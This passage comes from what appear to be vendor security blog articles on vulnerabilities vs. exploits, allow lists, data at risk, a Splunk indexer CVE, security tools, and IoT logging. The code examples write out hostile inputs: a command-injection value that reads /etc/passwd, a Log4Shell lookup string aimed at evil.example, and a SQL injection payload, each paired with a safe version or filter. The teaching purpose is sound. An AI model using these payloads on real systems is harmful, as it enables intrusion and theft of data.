Exploit vs. Vulnerability: What Is the Difference?

Whenever engineers discover a new security issue, the same questions arise: is this an exploit or a vulnerability? What is a software vulnerability, and how does it differ from an exploit?

A vulnerability is a gap in the armor, a weakness that allows someone to enter. The exploit is the mechanism used to get in. For example, a door with a fragile lock has a vulnerability; the exploit is the key, hammer, or lockpick used to break the lock. Let’s explore these definitions and look at some recent security incidents.

What is a software vulnerability?

A software vulnerability is some weakness in how a piece of software has been built. These come in many different forms, but some of the most common are:

  • Unsanitized inputs allow a user to enter something into a piece of software that changes its intended behavior.
  • Insecure requests issued from the website, such as websites that respond to plain HTTP requests.
  • Pages that require a lot of system resources to load.
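As an illustration of the first point, here is a minimal, hypothetical sketch of how an unsanitized input can change a program’s intended behavior. The example builds a shell command from user input; the function names and payload are made up for illustration:

```python
def build_ping_unsafe(host: str) -> str:
    # VULNERABLE: user input is concatenated directly into a shell command
    # string, so input containing ";" smuggles in a second command.
    return "ping -c 1 " + host

def build_ping_safe(host: str) -> list:
    # Safer: the value is passed as a single argv element, never via a shell,
    # so the payload is treated as one (invalid) hostname argument.
    return ["ping", "-c", "1", host]

malicious = "example.com; cat /etc/passwd"
print(build_ping_unsafe(malicious))
# -> ping -c 1 example.com; cat /etc/passwd
print(build_ping_safe(malicious))
# -> ['ping', '-c', '1', 'example.com; cat /etc/passwd']
```

The unsafe version lets the attacker append an arbitrary second command; the safe version never hands the raw string to a shell at all.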

These vulnerabilities are the first port of call for a hacker, and finding them takes up the majority of a malicious agent’s time. Well-known examples are the Log4Shell, GHOST, and Pwnkit vulnerabilities. Malicious agents hunt for these known vulnerabilities, looking for a gap in your application from which they can launch a more sophisticated attack using an exploit.

Exploit vs. Vulnerability – one is more subtle than the other

There is another, more subtle distinction when reviewing the question of exploit vs. vulnerability. A vulnerability might not have obvious relevance in a security context, but an exploit almost always does. A vulnerability might be as simple as a feature that lets you log in using a specific protocol, or one that saves your details in a central database. This is the problem: a vulnerability is any configuration or code that can be misused in unexpected ways. This makes it very, very difficult to write vulnerability-free code.

So what is an exploit in cybersecurity?

An exploit is some malicious code used to take advantage of a vulnerability. Most exploits have a set of common goals:

  • Steal private information from a system so that information can be sold.
  • Slow down or completely stop a system from working, so a ransom can be demanded.
  • Seize control of a server, to mount further attacks.

For example, the Log4Shell vulnerability was a weakness in the Log4j library that allowed users to execute arbitrary code via values that should simply have been printed in the logs. This was an example of poor input sanitization. Many different exploits were subsequently implemented that attempted to use this vulnerability in different ways: some allowed attackers to inject their own code, while others exposed the software’s private environment variables.
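The real fix for Log4Shell was patching Log4j itself, but as a hypothetical illustration of the input-sanitization idea, here is a minimal sketch that redacts lookup-style patterns (such as `${jndi:...}`) from untrusted values before they reach a logger that might interpret them:

```python
import re

# Illustrative only: strip "${...}" lookup patterns from untrusted values
# before logging them, so the logger never sees an interpretable directive.
LOOKUP_PATTERN = re.compile(r"\$\{[^}]*\}")

def sanitize_for_log(value: str) -> str:
    return LOOKUP_PATTERN.sub("[REDACTED]", value)

print(sanitize_for_log("user-agent: ${jndi:ldap://evil.example/a}"))
# -> user-agent: [REDACTED]
```

Pattern-stripping like this is defense in depth, not a substitute for upgrading the vulnerable dependency.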

But what about a Zero-Day vulnerability?

A zero-day vulnerability is a vulnerability that is made public without a patch already available. This means that you have zero days to fix it. Zero-day vulnerabilities are a currency unto themselves, and there are black markets that will trade these vulnerabilities before they are ever made public.

The aforementioned Log4Shell vulnerability was an example of a zero-day vulnerability because it became common knowledge before a patch was available and was already being exploited in the wild. When we’re assessing exploit vs. vulnerability, this is important to understand. A vulnerability is a weakness, so a gap in the armor was presented to the world before any fix was available. This is why Log4Shell was such a big event: it was a gap in almost everyone’s armor, and it was shown to the world before anyone could do anything about it.

Another example is the Heartbleed vulnerability, which allowed attackers to read protected memory areas over the Internet. This vulnerability was detected in the OpenSSL libraries, meaning it had proliferated across software for years.

Defending your organization against cyber attacks

Staying one step ahead of a cyber attack is an ongoing battle, with more sophisticated exploits built for more nuanced vulnerabilities. There are a few things engineers can do that will significantly improve their security posture.

Patch and never stop patching

Software is rarely wholly original. Most commonly, it’s a tapestry of open source and proprietary software that has been linked together with custom code. This means that one of the most effective ways to minimize vulnerabilities is to keep all of your dependencies up to date. This will ensure that you aren’t caught out by any legacy vulnerabilities that may be hanging around in your software.

Red-teaming and penetration testing

Red-teaming is the practice of hiring engineers to attempt to hack into your system. Your blue team will then actively try to defend against these attacks. This is a brilliant exercise because it helps your engineers become more aware of their system, weaknesses, and strengths. It also helps to establish ways of working when the organization is truly under attack. A more thorough alternative is to pay for an external penetration test, where a highly trained security specialist will attempt to find and document the major weaknesses in your system. A combination of these two strategies gives you an excellent understanding of the major weaknesses in your system.

Code scanning and CI/CD

Static code analysis allows you to dive deep into your code base and look for any code patterns that may indicate the presence of common vulnerabilities. For example, a code snippet that looks like this may trigger a flag for a SQL injection vulnerability:

String sqlQuery = "SELECT * FROM " + table + " WHERE VAL LIKE '" + input + "'";

Code scanning takes some of the burden off your software engineers and automates some of the more mundane code checks. However, it doesn’t completely lift the burden, and more complex vulnerabilities still need to be investigated to ensure they don’t pose any risk to your security posture.
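To see why that pattern gets flagged, here is a minimal sketch contrasting a concatenated query with a parameterized one. It uses Python with an in-memory SQLite database purely as an illustrative stand-in; the table and payload are made up:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, val TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'secret')")

user_input = "%' OR '1'='1"  # classic injection payload

# VULNERABLE: string concatenation lets the payload rewrite the query logic.
unsafe = "SELECT name FROM users WHERE val LIKE '" + user_input + "'"
print(conn.execute(unsafe).fetchall())  # returns every row

# Safer: a parameterized query treats the payload as a plain value.
safe = "SELECT name FROM users WHERE val LIKE ?"
print(conn.execute(safe, (user_input,)).fetchall())  # returns no rows
```

With concatenation, the `'1'='1'` clause makes the condition always true; with the placeholder, the same payload is just an unmatched string.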

Invest in your observability as soon as possible

Once you’ve got some strong preventative strategies in place, you need to look at how you defend against an attack in progress. The component of your system that will be integral to your success is your observability stack. Knowing precisely what your system is doing is essential to spotting when something out of the ordinary is happening. Whether you’re detecting a DDoS attack or noticing some unwanted IP addresses, it all begins with an effective, well-built, thorough observability function.

What is a Security Whitelist?

In April 2022 alone, 14.3 million records were breached across 80 significant security incidents. These incidents make up a complex, shifting landscape of cyberattacks that requires increasingly sophisticated defenses. While many of our methods are becoming more complex, some of our mechanisms are timeless, like the security whitelist. Also called an “allow list,” the security whitelist defines the permitted actions and blocks everything else.

Whitelist vs. Blocklist

Security whitelists operate on a deny by default policy, where anything that hasn’t been expressly allowed will be blocked. This is different from a blocklist, where everything is permitted except for the cases that a user has specified – also known as an allow by default policy. 

Through a security lens, the whitelist offers a greater potential for security. If something is “unknown,” it is denied automatically. New processes, IP addresses, applications, or file patterns are blocked straight away, which removes a huge part of your attack surface. However, it comes at a price.

If you deny everything by default, you need to explicitly allow all of the desirable processes. This is fine if you’re working on a system with only a few allowed actions, for example, a system with a list of permitted users. However, if you’re running a public website, placing a whitelist on all incoming traffic would mean that all users are denied access to your site. A blocklist is helpful here: allow everyone and block those who break the rules. What you lose in security, you gain in accessibility. This trade-off between confidentiality and availability, two pillars of the C-I-A triad, is a common challenge in information security. Let’s explore how whitelists are used in production environments to secure systems and keep data safe.

Email whitelisting

If you’re using an email provider like Google or Microsoft, you already have a list of all accounts in your organization. Using this information, you can automatically maintain an effective whitelist of authorized senders and block dangerous third parties. This catches phishing attacks before they can do any damage. If your whitelist allows anyone from @coralogix.com and an email comes in from the lookalike domain @cora1ogix.com, your whitelist will catch it.
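A sender allow list of this kind can be sketched in a few lines. This is a simplified, hypothetical illustration (real mail filtering is far more involved, verifying headers and sender authentication as well):

```python
ALLOWED_DOMAINS = {"coralogix.com"}  # hypothetical allow list

def is_allowed_sender(address: str) -> bool:
    # Deny by default: only exact domain matches against the allow list pass.
    domain = address.rsplit("@", 1)[-1].lower()
    return domain in ALLOWED_DOMAINS

print(is_allowed_sender("dev@coralogix.com"))   # True
print(is_allowed_sender("dev@cora1ogix.com"))   # False: lookalike blocked
```

Because matching is exact, the lookalike domain with a digit “1” in place of the letter “l” fails the check automatically.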

Of course, the challenge is an operational one. Email providers need to be able to process emails from authorized sources, such as from inside an organization, and external sources, like 3rd parties. This is why most email providers operate on a blocklist mechanism, where any emails are processed, suspicious activity is flagged, and the relevant accounts are blocked.

IP whitelisting

IP security whitelists are much more common. There are a few instances where you want to make use of an IP whitelist:

  • If you’re hosting a private service with a select group of customers, and you want to prevent network access to anyone outside of that group
  • You have private services that are not and will never be customer-facing

IP whitelists are the foundation of a robust, layered security model. They are essential in securing systems that have both public-facing and internal components. However, they can become an operational nightmare if you have public-facing services only. In this instance, a blocklist makes more sense. Blocklists usually take the form of web application firewalls that analyze traffic as it passes through and immediately detect malicious behavior.
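A minimal sketch of an IP allow list follows, using made-up networks; anything not in a listed range is denied by default:

```python
import ipaddress

# Hypothetical allow list: an internal range and one partner address.
ALLOWED_NETWORKS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("203.0.113.7/32"),
]

def is_ip_allowed(addr: str) -> bool:
    # Deny by default: the address must fall inside an allowed network.
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in ALLOWED_NETWORKS)

print(is_ip_allowed("10.42.1.9"))     # True: inside the internal range
print(is_ip_allowed("198.51.100.4"))  # False: denied by default
```

In practice this logic usually lives in a firewall rule or security group rather than application code, but the deny-by-default shape is the same.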

File and application whitelisting

Large organizations will typically set up employee machines with an application whitelist, meaning users are permitted to use only the tools they need for their job, and nothing more. This minimizes the attack surface because the whitelist automatically blocks malicious code. It’s also a great way of avoiding fines for using unlicensed software.

This is an example of perimeter security: focusing on ensuring new threats don’t enter at the edges of your system. It works, but if your perimeter security is too strict, you’ll prevent legitimate users from getting things done. For example, software engineers use an ever-changing selection of software tools. Without an easy way to approve new applications and permissions, strict application whitelisting can cause serious interruptions to legitimate work.

More than that, in the age of remote working, “bring your own device” has become ubiquitous, with 47% of companies in the UK operating a BYOD approach during the pandemic. It is challenging to whitelist an employee’s personal computer and invites complex ethical and privacy concerns.

A middle ground is a blocklist approach, such as those found in antivirus software. Antivirus software takes fingerprints (known as hashes) of malicious code and regularly scans applications and files on the host computer. If it detects these malicious code patterns, it quarantines the offending application and informs the user. While this is less secure, it poses less risk of interrupting legitimate work.
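The fingerprinting approach can be sketched as follows. The “known bad” hash here is fabricated for illustration; real antivirus products maintain large, regularly updated signature databases:

```python
import hashlib

# Hypothetical blocklist of known-bad file fingerprints (SHA-256 hashes).
KNOWN_BAD_HASHES = {
    hashlib.sha256(b"malicious payload").hexdigest(),
}

def is_quarantined(file_bytes: bytes) -> bool:
    # Fingerprint the file and check it against the blocklist.
    fingerprint = hashlib.sha256(file_bytes).hexdigest()
    return fingerprint in KNOWN_BAD_HASHES

print(is_quarantined(b"malicious payload"))  # True: matches a known hash
print(is_quarantined(b"legitimate file"))    # False: unknown files run freely
```

Note the allow-by-default property: anything whose hash is unknown runs freely, which is exactly the trade-off the text describes.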

Whitelists for input validation

Input validation is standard practice in software engineering. Attacks like SQL injection and the Log4Shell vulnerability are caused by insufficient input validation. The Log4Shell attack takes a value that would otherwise be harmlessly printed into application logs and turns it into a remote code execution attack, allowing a successful attacker to run arbitrary code.

A typical approach to validating input is to use a regex check as a filter. For example, if someone submits a string value that should be an email, a simple bit of regex like this will detect whether or not it is valid: [\w-]+@([\w-]+\.)+[\w-]+

This creates an effective whitelist because you’re stating upfront what is permitted, and everything else is rejected. This is a non-negotiable step in defending your APIs and front-end applications from exploitation by malicious agents.
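Applied in code, that pattern acts as an allow list: only email-shaped strings pass, and everything else is rejected. This is an illustrative check only; real-world email validation is considerably more involved:

```python
import re

# The pattern from the text; fullmatch requires the ENTIRE value to match,
# so partial matches inside a larger malicious string are rejected.
EMAIL_RE = re.compile(r"[\w-]+@([\w-]+\.)+[\w-]+")

def is_valid_email(value: str) -> bool:
    return EMAIL_RE.fullmatch(value) is not None

print(is_valid_email("dev@coralogix.com"))              # True
print(is_valid_email("${jndi:ldap://evil.example/a}"))  # False: rejected
```

Anchoring the whole string (rather than searching for a match anywhere inside it) is what turns a pattern into a whitelist.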

Summary

Allow lists offer the ability to maximize your security position, but they naturally come with the operational burden of ensuring that they do not hamper legitimate use of your system. Blocklists are the complete opposite end of the spectrum and allow you to minimize the impact on your users, but the shoe is on the other foot – now you need to keep up with threats on the broader market to ensure your blocklist doesn’t allow malicious traffic. Whichever way you choose, an access control list of this kind is vital for minimizing the risk of an attack that could have crippling consequences for your business.

What is the Most Vulnerable Data My Company Holds?

Data security is on every priority list in 2022. With breaches more frequent than ever, many businesses are assessing their situation and asking difficult cybersecurity questions.

With cybersecurity policy, everything boils down to risk. Ultimately, every decision-maker wants to know, “how likely are we to be attacked?”

Many believe cybercriminals only target certain kinds of data. Sensitive information, high-value financial data, and medical records are all widely accepted to carry a high risk.

The misconception? That storing none of the above means little-to-no risk. Almost every document stored on your company servers is a potential target for cybercriminals in today’s threat landscape. 

We will break down the data types that carry the highest risk, so you’ll finally know how much potential threat is stored in your servers.

The scale of data theft

Data and information theft have always accounted for a large portion of cybercrime. Some estimates put the frequency at roughly 44 records stolen per second. That’s 3,809,448 per day globally. Less conservative figures put the daily number as high as 22.5 million.

Whether the actual figure is closer to three or twenty-two million is irrelevant. Both ends of the scale are high. What matters is that every day your data and records are at risk of being stolen.

Why do cybercriminals want my company data and records?

The reason data theft remains a favorite pastime of cybercriminals is primarily financial. While this is obvious for certain kinds of data (such as customer payment information), for other kinds the financial incentive is less straightforward.

Hackers and cybercriminals can turn almost any stolen data into a profit. Even seemingly meaningless information is valuable to somebody, somewhere, making it worth stealing. Sometimes stolen data is sold on the dark web; in other cases, it is used for ransom attacks. The list of ways cybercriminals can capitalize on stolen data is almost as long as the list of ways they can steal it.

Remember, not all hackers are after huge sums. Many small businesses are severely disrupted by cybercriminals seeking to walk away with as little as a few hundred dollars (and some by thrill-hackers who aren’t financially motivated).

As a rule of thumb, never assume your data and records are safe because they don’t seem financially valuable. No matter how much you believe your data to be “worth” to a hacker, it is still at risk, and the costs of a breach to your business are always high.

The types of data most vulnerable to attempted theft

Now that we’ve covered the scale of data theft, let’s break down the highest-risk types of data and records that businesses like yours may have on their servers.

Payment data

71% of all data breaches are financially motivated. It’s unsurprising then that payment data is the type of record most targeted by hackers.

This is why many small businesses’ belief that their size makes them unappealing to cybercriminals is so dangerous.

Stolen customer credit cards, Visa debit cards, PayPal accounts, or other payment credentials are a source of easy income for hackers. There are many high-profile incidents where gigabytes of customer payment information were stolen from companies and sold on the black market.

One of the most notorious examples is the Adobe breach of 2013. Hackers stole nearly 3 million credit card numbers from a compromised database of 38 million Adobe users. The costs to Adobe were known to reach at least $1.1 million, but the exact total, once the (undisclosed) settlements with former users are factored in, is still unknown.

It’s clear why 3 million credit card numbers are an enticing prospect for a cybercriminal. While there are few companies with as many users as Adobe, the high-profile breach they experienced was far from an isolated incident.

Why the Adobe breach wasn’t an isolated incident

Selling stolen data on the black market is risky and isn’t the goal for most hackers. Most stolen payment information is used to skim small amounts, directly purchase goods, or open new credit lines to be drained into separate accounts controlled by cybercriminals.

This makes small businesses incredibly vulnerable. If your aim isn’t to sell millions of payment details, there’s little incentive to hack a corporation like Adobe with a dedicated cybersecurity team.

Most cybercriminals are likely to target less-protected payment records held by SMEs. Not only are these easier to obtain, but they’re also far less likely to attract attention (meaning the operation can continue another day).

It’s highly unlikely you will have no customer payment info on your servers in 2022. Whether dealing with three or three million users, you must keep their payment data secure.

Authentication Details

Authentication details are perhaps the most dangerous records to lose in a breach. All it takes is one compromised login for cybercriminals to browse your systems at their leisure. Once they have access, it’s only a matter of time before further data (like customer financial records) is seized.

Credential-based attacks aren’t rare: 81% of breaches in 2020 utilized stolen and/or weak passwords. Authentication details and credentials are obtained in many ways; keylogging software is one, and deceiving employees into handing over their login information is another common method.

Compromised login details are a huge security risk. Once a cybercriminal is in your systems under the guise of a valid user, they can operate more or less undetected. This leaves them free to steal further data, deploy malware, or take your systems offline entirely.

How many stolen passwords are out there?

In 2020, an audit of several known dark web black markets revealed at least 15 billion individual login credentials available for sale. These weren’t only for popular platforms like Facebook and online banks, but also for private company servers.

The same report found that domain administrator accounts were auctioned for an average of $3,139, with some going for as much as $120,000. In this context, it’s clear that your business’s authentication data is a target for theft.

If you’re an SME, you’re seen as an easy target. Staff are less likely to be trained in online safety, for one thing. According to IBM, human error is a ‘major contributing cause’ in 95% of data breaches. Password hygiene, multi-factor authentication, and secure login credentials are essential, especially for small businesses.

It’s almost certain that those 15 billion black market credentials included hundreds, maybe even thousands, of businesses like yours.

Medical records, customer documents, and other sensitive information

It’s no secret that sensitive and confidential records like medical documents are a target for cybercriminals. There have been many high-profile healthcare data breaches. In 2015, the second largest healthcare insurer in the US, Anthem Inc., had records of 80 million customers stolen. This irreparably damaged Anthem’s reputation and led to a $39 million settlement.

The stolen data contained no medical treatment records. The hackers seized names, dates of birth, addresses, employment information, and Social Security numbers. Why is that important? Because they’re records that almost every company will hold.

The customer information on your database doesn’t have to be medical treatments, criminal records, or personal conversations (like any app with a message function, for example). If your customers, users, or clients leave any personal details in your care, cybercriminals want them.

Which sector is most at risk of customer data theft?

While no treatment records were stolen in the Anthem breach, the fact remains that healthcare is one of the most at-risk sectors. Some estimates claim that as many as 1 in 8 US citizens have had medical records compromised in a breach.

It’s a misconception that the healthcare sector is at risk exclusively because of the sensitivity of medical records. This is only partially correct. It’s also because healthcare is one of the world’s largest (and most accessible) industries.

This is why retail and accommodation/tourism are just as vulnerable to data theft as finance, healthcare, and the public sector. E-commerce records may not be compromising or sensitive, but they exist in abundance. It’s not only sensitive records at risk; any record from any industry is a target.

So, is ANY of my data safe?

The short answer? No. In case the message we’re trying to send isn’t clear: all the data your company holds is vulnerable. There are no records or information stored in your data centers that aren’t a potential target for hackers.

As all cybersecurity professionals will tell you, the question isn’t if you’ll be a target of data theft; it’s when.

Modern solutions for modern threats

Fortunately, it is possible to keep your data secure in 2022. The problem many face is applying 20th-century thinking to the 21st-century threat landscape.

Your data security solution shouldn’t start with the question, “what specifically is at risk?” In so many of the examples above, successful data thieves exploited “low risk” vulnerabilities.

21st-century cybersecurity should be built on a system of assumed risk and total system visibility. Every KB of network traffic could contain the next threat, and every PDF scan, line of code, or customer database is a possible target.

Observability: A Cybersecurity Essential

Keeping all of your data records secure means ensuring the entire system they’re in is observable. That’s why platforms like ours are essential. Almost every data breach we’ve used as an example could have been avoided if the cybercriminals couldn’t operate undetected.

A fully visible system means no hidden blind spots for hackers to exploit. The answer to this piece’s titular question is “all of it.” It’s paramount your security solution reflects this.

Splunk Indexer Vulnerability: What You Need to Know

A new vulnerability, CVE-2021-3422, has been discovered in the Splunk indexer component, which is a commonly utilized part of the Splunk Enterprise suite. We’re going to explain the affected components, the severity of the vulnerability, mitigations you can put in place, and long-term considerations you may wish to make when using Splunk.

What is the affected component?

The Splunk indexer is responsible for sorting and indexing data that the Splunk forwarder sends to it. It is a central place where much of your observability data will flow as part of your Splunk setup. The forwarder and the indexer communicate with one another using the Splunk 2 Splunk (S2S) protocol. 

The vulnerability itself lies within the validation that is inherent within the S2S protocol. The S2S protocol allows for a field type called field_enum_dynamic. What this field allows you to do is send a numerical value in your payload, and have it automatically mapped to some corresponding text value. This is useful because your machines can talk in status codes, but those codes can be dynamically mapped to human-readable text.

What is the impact of the vulnerability?

This field type, field_enum_dynamic, is not validated properly, which means that a specially crafted value can enable a malicious attacker to read memory that they shouldn’t be able to access. This is called an Out of Bounds (OOB) read vulnerability, and essentially means an attacker can read beyond their intended memory boundaries.

An alternative attack might be to intentionally trigger a page fault, which would shut down the Splunk service. Doing this repeatedly would result in a Denial of Service (DoS) attack. For these reasons, this CVE is considered high severity with a score of 7.5. 

What mitigations can you put in place?

Splunk has released patches for the impacted components. The new versions that are not vulnerable to this attack are 7.3.9, 8.0.9, 8.1.3, and 8.2.0. Priority number one should be upgrading to one of these versions, where this attack has been fully mitigated.

If upgrading is not an option, you may wish to look into implementing SSL for your Splunk forwarders or enabling forwarder access control using a token. These steps make it more difficult for a malicious attacker to send specially crafted packets to your indexer, because they’ll need to compromise the SSL certificate or the token first.

What do we need to think about in the long term?

OOB vulnerabilities can be particularly nasty, and not just because of the possibility of leaking information in Splunk: if your attacker has specialist knowledge of your system, they can expand to memory being used by completely different applications. For example, if an attacker knows that your SSL certificates are loaded into an adjacent area of memory, they may be able to read those too. They might even be able to perform a full memory dump, one packet at a time.

This means that the danger of this Splunk vulnerability isn’t just in the Splunk data you may leak, but in the much more sensitive information that the attacker may be able to access. This means that you immediately become dependent on the security of the underlying infrastructure.

How secure is your on-premise infrastructure?

It is tempting to think that your on-premise data centers are a bastion of security. You have complete control over their configuration, so you’re able to finely tune them. In reality, this may not be the case. It’s very easy to forget to enable Address Space Layout Randomization (ASLR) or Data Execution Prevention (DEP) on your instances, both of which would make these types of vulnerabilities more difficult to exploit. These are just two of a number of switches that you need to understand, to build and deploy secure hardware in your data center.

A cloud provider like AWS will automatically enable these types of features for you, so that your virtual machine is immediately more secure. If this type of attack occurred in a cloud-based environment, it would be much more difficult to exploit adjacent applications in memory, because cloud environments often come with a lot of very sensible security defaults to prevent processes from reading beyond their allotted memory. This is part of the reason why 61% of security researchers say that a breach in a cloud environment is usually equally or less dangerous than the same breach in an on-premise environment. 

Would a SaaS observability tool be impacted by this?

Splunk indexers operate within the customer’s own infrastructure, which means that a vulnerability in a Splunk component is an inherent vulnerability in the user’s software. This reduces the control the user has, because they aren’t the ones producing patches.

Coralogix is a central, multi-tenant, full-stack observability platform that provides a layer of abstraction between the internal workings of your system and your observability data, preventing vulnerabilities like CVE-2021-3422 from being chained with other attacks.

5 Cybersecurity Tools to Safeguard Your Business

With the exponential rise in cybercrime in the last decade, cybersecurity for businesses is no longer an option — it’s a necessity. Fueled by the forced shift to remote working during the pandemic, US businesses saw an alarming 50% rise in reported cyber attacks per week from 2020 to 2021. Yet many companies still rely on outdated technologies, unclear policies, and understaffed cybersecurity teams to combat digital attacks.

So, if you’re a business looking to upgrade its cybersecurity measures, here are five powerful tools that can protect your business from breaches.

1. Access Protection

Designed to monitor outgoing and incoming network traffic, firewalls are the first layer of defense from unauthorized access in private networks. They are easy to implement, adopt, and configure based on security parameters set by the organization.

Among the different types of firewalls, one of the popular choices among businesses is a next-generation firewall. A next-generation firewall can help protect your network from threats through integrated intrusion prevention, cloud security, and application control. A proxy firewall can work well for companies looking for a budget option.

Even though firewalls block a significant portion of malicious traffic, expecting a firewall alone to suffice as a security solution would be a mistake. Advanced attackers can build attacks that bypass even the most complex firewalls, and your organization’s defenses must keep up with these sophisticated attacks. Thus, instead of relying on a single firewall, your business needs to adopt a multi-layer defense system. One of the first vulnerabilities you should address is unsecured endpoints.

2. Endpoint Protection

Endpoint Protection essentially refers to securing devices that connect to a company’s private network beyond the corporate firewall. Typically, these range from laptops, mobile phones, and USB drives to printers and servers. Without a proper endpoint protection program, the organization stands to lose control over sensitive data if it’s copied to an external device from an unsecured endpoint.

Software like antivirus and anti-malware tools form the essential elements of an endpoint protection program, but current cybersecurity threats demand much more. Thus, next-generation antiviruses with integrated AI/ML threat detection, threat hunting, and VPNs are essential to your business.

If your organization has shifted to being primarily remote, implementing a protocol like Zero Trust Network Access (ZTNA) can strengthen your cybersecurity measures. Secure firewalls and VPNs, though necessary, can create an attack surface for hackers to exploit since the user is immediately granted complete application access. In contrast, ZTNA isolates application access from network access, giving partial access incrementally and on a need-to-know basis. 

Combining ZTNA with a strong antivirus creates multi-layer access protection that drastically reduces your cyber risk exposure. However, as we discussed earlier, bad network actors who can bypass this security will always be present. Thus, it’s essential to have a robust monitoring system across your applications, which brings us to the next point…

3. Log Management & Observability

Log management is a fundamental security control for your applications. Drawing information from event logs can be instrumental in identifying network risks early, blocking bad actors, and quickly mitigating vulnerabilities during breaches or event reconstruction.

However, many organizations still struggle with deriving valuable insights from log data due to complex, distributed systems, inconsistency in log data, and format differences. In such cases, a log management system like Coralogix can help. It creates a centralized, secure dashboard to make sense of raw log data, clustering millions of similar logs to help you investigate faster. Our AI-driven analysis software can help establish security baselines and alerting systems to identify critical issues and anomalies. 

A strong log monitoring and observability system also protects you from DDoS attacks. A DDoS attack floods the bandwidth and resources of a particular server or application through unauthorized traffic, typically causing a major outage. 

With observability platforms, you can get ahead of this. Coralogix’s native Cloudflare integrations, combined with load balancers, give you the ability to cross-analyze attack and application metrics and enable your team to mitigate such attacks. Thus, you can effectively build a DDoS warning system to detect attacks early.
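The volume-based side of such a warning system can be sketched in a few lines. This is an illustrative baseline-and-spike check, not Coralogix’s actual alerting logic; the window size and spike factor are assumptions:

```python
from collections import Counter
from datetime import datetime, timedelta

def ddos_warning(timestamps, window_minutes=10, spike_factor=5.0):
    """Flag any minute whose request count exceeds spike_factor times
    the average of the preceding window_minutes minutes.

    timestamps: iterable of datetime objects, one per request.
    Returns a list of (minute, count, baseline) tuples.
    """
    per_minute = Counter(ts.replace(second=0, microsecond=0) for ts in timestamps)
    minutes = sorted(per_minute)
    alerts = []
    for i, minute in enumerate(minutes):
        baseline_window = minutes[max(0, i - window_minutes):i]
        if not baseline_window:
            continue  # no history yet to compare against
        baseline = sum(per_minute[m] for m in baseline_window) / len(baseline_window)
        if per_minute[minute] > spike_factor * max(baseline, 1.0):
            alerts.append((minute, per_minute[minute], baseline))
    return alerts
```

In practice you would feed this from your ingested access logs and tune the thresholds against your normal traffic profile.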

Along with logs, another critical business channel that you should monitor regularly is email. With over 36% of data breaches in 2022 attributed to phishing scams, businesses cannot be too careful.

4. Email Gateway Security

As most companies primarily share sensitive data through email, email gateways are a prime target for cybercriminals. Thus, a top priority should be robust filtering systems that identify spam and phishing emails, embedded code, and fraudulent websites.

Email gateways act as a firewall for all email communications at the network level — scanning and auto-archiving malicious email content. They also protect against business data loss by monitoring outgoing emails, allowing admins to manage email policies through a central dashboard. Additionally, they help businesses meet compliance by safely securing data and storing copies for legal purposes. 
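The link-scanning part of such a filter can be illustrated with a toy example. The allowlist, the regular expression, and the function name here are assumptions for the sketch; real gateways use far richer reputation and content analysis:

```python
import re

# Hypothetical allowlist of domains the organization trusts in email links.
ALLOWED_DOMAINS = {"example.com", "mail.example.com"}

# Extracts the host portion of http(s) URLs in a message body.
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)

def suspicious_links(email_body):
    """Return link domains in the body that fall outside the allowlist,
    a common (if crude) phishing indicator."""
    return [d.lower() for d in URL_RE.findall(email_body)
            if d.lower() not in ALLOWED_DOMAINS]
```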

However, the issue here is that sophisticated attacks can still bypass these security measures, especially if social engineering is involved. One wrong click by an employee can give hackers access to an otherwise robust system. That’s why the most critical security tool of them all is a strong cybersecurity training program.

5. Cybersecurity Training

Even though you might think that cybersecurity training is not a ‘tool,’ a company’s security measures are only as strong as the awareness of the employees who use them. In 2021, over 85% of data breaches were associated with some level of human error. IBM’s study even found that in 19 out of 20 cases analyzed, the breach would not have occurred without the human element.

Cybersecurity starts with people, not just tools. Thus, you need to build a strong security culture around threats like phishing and social engineering in your organization. All resources related to cybersecurity should be simplified and made mandatory during onboarding. These policies should be reviewed, updated, and re-taught semi-annually in line with new threats.

Apart from training, the execution of these policies can mean the difference between a hackable and a secure network. To ensure this, regular workshops and phishing tests should be conducted to identify potential employee targets. Another way to increase the effectiveness of this training is to send out a cybersecurity newsletter every week.

Some companies like Dell have even adopted a gamified cybersecurity training program to encourage high engagement from employees. The addition of screen locks, multi-factor authentication, and encryption would also help add another layer of security. 

Upgrade Your Cybersecurity Measures Today!

Implementing these five cybersecurity tools lays a critical foundation for the security of your business. However, the key here is to understand that, with cyberattacks, it sometimes just takes one point of failure. Therefore, preparing for a breach is just as important as preventing it. Having comprehensive data backups at regular intervals and encryption for susceptible data is crucial. This will ensure your organization is as secure as your customers need it to be — with or without a breach!

IoT Security: How Important Are Logs for Your System?

IoT has rapidly moved from a fringe technology to a mainstream collection of techniques, protocols, and applications that better enable you to support and monitor a highly distributed, complex system. One of the most critical challenges to overcome is processing an ever-growing stream of analytics data, from IoT security data to business insights, coming from each device. Many protocols have been implemented for this, but could logs provide a powerful option for IoT data and IoT monitoring?

Data as the unit of currency

The incredible power of a network of IoT devices comes from the sheer volume and sophistication of the data you can gather. All of this data can be combined and analyzed to create actionable insights for your business and operations teams. This data is typically time-series data, meaning that snapshots of values are taken at time intervals. For example, temperature sensors will regularly broadcast updated temperatures with an associated timestamp. Another example might be the number of requests to non-standard ports when you’re concerned with IoT security. The challenge, of course, is how to transmit this much data to a central server where it can be processed: IoT data collection typically produces a very large volume of information for a centralized system to handle.
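For instance, a sensor reading can be carried as an ordinary structured log line. The field names below are assumptions for the sketch, not a fixed schema:

```python
import json
from datetime import datetime, timezone

def sensor_log_line(device_id, metric, value, ts=None):
    """Serialize one time-series reading as a structured (JSON) log line,
    ready to ship through any ordinary log pipeline."""
    ts = ts or datetime.now(timezone.utc)
    return json.dumps({
        "timestamp": ts.isoformat(),  # every reading carries its own timestamp
        "device_id": device_id,
        "metric": metric,
        "value": value,
    })
```

A device would emit one such line per reading; the log pipeline then handles batching, transport, and retention exactly as it does for server logs.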

The thing is, this is already a very well-understood problem in the world of log analytics. We typically have hundreds, if not thousands, of sources (virtual machines, microservices, operating system logs, databases, load balancers, and more) that are constantly broadcasting information. IoT software doesn’t pose any new challenges here! Conveniently, logs are almost always broadcast with an associated timestamp too. Rather than reinventing the wheel, you can simply use logs as your vehicle for transmitting your IoT data to a central location.

Using the past to predict the future

